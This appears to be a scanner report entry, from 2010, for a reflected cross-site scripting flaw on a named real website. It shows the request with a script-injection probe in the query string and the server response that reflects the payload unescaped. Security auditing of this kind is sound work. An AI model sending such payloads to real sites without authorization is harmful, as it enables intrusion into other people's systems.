1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.orange.md |
Path: | / |
GET /?8644b"><script>alert(1)< Host: www.orange.md Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 17:46:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=vg97rjp6o2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=WINDOWS-1251 Content-Length: 43570 <html> <title>Orange Moldova</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <meta http-equiv="PRAGMA" content="NO-CACHE"> <meta name="description" content=" ...[SNIP]... <a href="/?8644b"><script>alert(1)< ...[SNIP]... |